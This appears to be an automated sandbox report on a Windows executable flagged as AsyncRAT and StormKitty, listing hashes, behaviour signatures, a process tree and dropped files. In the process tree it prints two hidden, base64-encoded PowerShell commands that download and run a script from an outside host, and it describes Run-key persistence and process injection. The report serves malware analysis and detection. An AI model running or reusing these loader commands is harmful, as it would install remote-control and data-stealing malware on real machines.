Overview

overview

10

Static

static

1

fbbb5ea69c...1).exe

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-11-2024 11:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe

  • Size

    95.5MB

  • MD5

    ce6f5ba448e5b85d0410c70eb68b8b7b

  • SHA1

    d82919e11eeaa23997e5047d2041c5acb8c3bab5

  • SHA256

    fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c

  • SHA512

    1f9a82b77ae9e18d82b4c0751e114b27f1b009968644353ed2bfeb5315b8f8fcd4dee4c74b00d35bc1f76cd0bd0078014697797dfe4fd082dd54460aa7260dee

  • SSDEEP

    1536:srae78zjORCDGwfdCSog01313zAYs5gczGNuKTFP76k:0ahKyd2n31UR5MTFPJ

Score
10/10
asyncratstormkittydiscoveryexecutionpersistenceratstealer

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 10 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Suspicious use of SetThreadContext 2 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe
    "C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c(1).exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4816
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c sora.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2464
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwAuAHQAeAB0ACcAKQA=
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1616
        • C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
          "C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1204
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            5⤵
              PID:1956
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1976
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1976 -s 1296
                6⤵
                • Program crash
                PID:4336
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c sorast.bat
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4084
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwBzAHQALgB0AHgAdAAnACkA
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1192
          • C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe
            "C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4236
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3240
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1976 -ip 1976
      1⤵
        PID:4620

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        56c43715e0e7fa58012d8a5769d8d568

        SHA1

        4370ca3436f2e3a95b47a728503a2c22a5a5fa39

        SHA256

        8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5

        SHA512

        b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        4fe81288ed69f286820a38e284c3e424

        SHA1

        f6ed802cf562c4646f629ae6946d6fc77f39d97e

        SHA256

        b0794129d82ac2c3f372bf8582d9e55e9c63b3843d6d0e9bc111d482355bdcd3

        SHA512

        8813941122dadd5b05243b94317f52285f4be468c633609fe5c2103c6ca57568631c908c11db234e45839023789403ca023b708f929eb96adca0cd7068c66afd

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sora.bat
        Filesize

        6KB

        MD5

        345718527c30710326719967e3fd4d50

        SHA1

        8f7be9c69a4e95155dd33c935f362155d91c05dc

        SHA256

        ac4db954f2a68c4b12ba72dc4feb193c16b9bdc6a58d9550a9a5fb7383227bd5

        SHA512

        21bf40922a5fb96239eff6107d394cac3862b2a9068b80949bfe158a420d1588685d005c0d70ed69b7614d393b3f846d1d61e13048e9650a5087367b6f7c54f6

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sorast.bat
        Filesize

        7KB

        MD5

        d80437fda6ba90dd8338ca91fbcc18dc

        SHA1

        87415b5650b55ff7b2a38684768a49018e42d982

        SHA256

        81d20d2731ab795995553d20cb60a7481ae4fa27615257418489f802683b435a

        SHA512

        2ffc42e30f0a63d1b9a563ee9ec346faf26a71d4f9f3a429f35e4d95d446a2dbc6aa2bb43a37d0b8533feb02bd738e5708be49919ad27cc572175d547be07240

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_42rzgt5i.h21.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Public\Downloads\Chromeservices\Qt5Core.dll
        Filesize

        3.2MB

        MD5

        0897cd584a6a8e39b9f2e25a2ab193e2

        SHA1

        4af09f0291c659d74e4e7f1a7e96632b3987daef

        SHA256

        8c7cda207cb9031fb126719a43bff6e2fb4b8e2ccffb3efa2b895f6092603b65

        SHA512

        bfb5663756a8b18a0945e9e654256870f100de50e815dcddb86a2aed06bb85b2e5792e121b4af0560987adc40c5b9e020a5e32e1ddf4dafd29efc2aca9b9a427

        Download Submit

      • C:\Users\Public\Downloads\Chromeservices\concrt140e.dll
        Filesize

        292KB

        MD5

        8b0e3a4d5c72ddee5866296bcb2c8185

        SHA1

        d689fbf9c6fcf957243e0c3f89831cecf69eade3

        SHA256

        2d585161ec71beeaf8234163341482a06d6ee01856e058518986a59fbddeb11b

        SHA512

        ca33dccc148b9acdeb1f064d6313101c8bc5daaed04f417b42a30d2bf4788e7d23b8536c0431650fbe5fcf4b44aeab3db478452390f4cb78ea42d731e8a5e198

        Download Submit

      • C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
        Filesize

        45KB

        MD5

        25ab75a586f4b22ebae81e74b20bfee9

        SHA1

        97f52704adbbd42f1c6415f565241ba1521c450f

        SHA256

        14a4044215f341ba1ece3e49d475e309749b65c8959f2724d26209ed705a225a

        SHA512

        cfa18fcccdeb95450f9ddb24dd620edca3faec765d339395884bcd2369783e37fd41ab3923a2d7439512670eb9389555dfc5a72adb725c818d2a5f4ea5154f7c

        Download Submit

      • C:\Users\Public\Downloads\Edgeservices\Qt5Core.dll
        Filesize

        3.1MB

        MD5

        d63a867c0a14584dfe04a9712c64bc0b

        SHA1

        3dc1c8e9ca93962a6d3400be3ac7d76d65f87a01

        SHA256

        60dbf8cb76cbfc6a1b6df53ea3c087eecba1bf59737a1de2a2b96475f0c912c0

        SHA512

        aeebf3c911816b0b984bf78a43275575e7e1ddb61473d0bd14504316cf389da0373e78948c0ba3d54146aed95f2569987549b76a1325e0c949e2d16e038c8914

        Download Submit

      • C:\Users\Public\Downloads\Edgeservices\VCRUNTIME140_1.dll
        Filesize

        36KB

        MD5

        d8d1a08176ba2542c58669c1c04da1b7

        SHA1

        e0d0059baf23fb5e1d2dadedc12e2f53c930256d

        SHA256

        26c29d01df73a8e35d32e430c892d925abb6e4ad62d3630ae42b69daacba1a0d

        SHA512

        5308790fbcf6348e87e7d5b9235ed66942527326f7ba556c910d68d94617bdd247a4ed540b4b9f8d4e73d15cf4a7204c0a57d4fd348ec26e53f39b91be8617fb

        Download Submit

      • C:\Users\Public\Downloads\Edgeservices\concrt140e.dll
        Filesize

        2.3MB

        MD5

        22c3fc378a3c3311bb5e9082c443fbd4

        SHA1

        06c32b31de4772da425c1eebc6c8064ed4305843

        SHA256

        422172e732ebd0892d8e737c07c3a9fead044f6f0d587a2e5991c40783e03ca9

        SHA512

        4330eb482c2257a1775e1edc10753dc302042266fc012a20007c1706e31c65a67017d7eb63a1eb5e13a84b7638ddf24017c63b71e92dfd30215cc7ab7f878a4b

        Download Submit

      • C:\Users\Public\Downloads\Edgeservices\msvcp140.dll
        Filesize

        552KB

        MD5

        29c6c243cfb1cec96b4a1008274f9600

        SHA1

        c54b10ef6305cc3814c68e6c8fd6daecbb27622a

        SHA256

        44a5af24f8d5f9c50a9e5a200a0486100afb6a0e86377e2e3e622a7bbb57cb04

        SHA512

        39c34554ea7b6d433c2aecfdeff87959e625e943bf7a446ebca8e5878eaf24198c1b188359a0343fb78478f2bc8b986ca4d0e69d39bac6ff80cb901fe4f113ee

        Download Submit

      • C:\Users\Public\Downloads\Edgeservices\vcruntime140.dll
        Filesize

        94KB

        MD5

        02794a29811ba0a78e9687a0010c37ce

        SHA1

        97b5701d18bd5e25537851614099e2ffce25d6d8

        SHA256

        1729421a22585823493d5a125cd43a470889b952a2422f48a7bc8193f5c23b0f

        SHA512

        caf2a478e9c78c8e93dd2288ed98a9261fcf2b7e807df84f2e4d76f8130c2e503eb2470c947a678ac63e59d7d54f74e80e743d635428aa874ec2d06df68d0272

        Download Submit

      • memory/1616-18-0x0000019C22560000-0x0000019C22722000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/1616-65-0x00007FFD55E20000-0x00007FFD568E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1616-69-0x00007FFD55E20000-0x00007FFD568E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1616-48-0x00007FFD55E23000-0x00007FFD55E25000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1616-17-0x00007FFD55E20000-0x00007FFD568E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1616-16-0x00007FFD55E20000-0x00007FFD568E1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1616-12-0x0000019C1FE00000-0x0000019C1FE22000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1616-5-0x00007FFD55E23000-0x00007FFD55E25000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1976-66-0x0000000000400000-0x000000000064A000-memory.dmp

        Filesize

        2.3MB

        Download

      • memory/1976-70-0x00000000059D0000-0x0000000005F74000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/1976-84-0x0000000005420000-0x0000000005486000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3240-132-0x0000000000400000-0x0000000000457000-memory.dmp

        Filesize

        348KB

        Download

      • memory/3240-133-0x0000000000400000-0x0000000000457000-memory.dmp

        Filesize

        348KB

        Download